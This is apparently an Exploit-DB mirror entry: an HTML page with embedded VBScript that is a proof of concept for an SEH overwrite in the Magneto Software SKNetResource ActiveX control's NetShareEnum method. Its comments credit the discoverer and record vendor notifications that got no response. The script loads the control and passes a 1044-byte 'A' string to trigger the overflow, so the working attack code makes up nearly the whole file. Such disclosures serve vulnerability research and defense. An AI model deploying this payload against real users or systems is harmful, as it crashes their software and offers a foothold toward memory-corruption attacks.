exploit-db-mirror/exploits/windows/dos/12207.html

<html>
<object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' /></object>
<script language='vbscript'>
'Magneto Software Net Resource ActiveX NetShareEnum SEH Overwrite POC
'Discovered by:  s4squatch
'Site:  www.securestate.com
'Date Discovered: 02/11/10
'www:  http://www.magnetosoft.com/products/sknetresource/sknetresource_features.htm
'Download:  http://www.magnetosoft.com/downloads/SystemInfoPackSetup.exe
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'SKNetResource.ocx
'Function NetShareEnum ( ByVal strServerName As String ,  ByRef pvarNetShareInfo As Variant ) As Long
'progid = "SKNETRESOURCELib.SKNetResource"

'SEH overwrite
arg1=String(1044, "A")
arg2="defaultV"

target.NetShareEnum arg1 ,arg2

</script>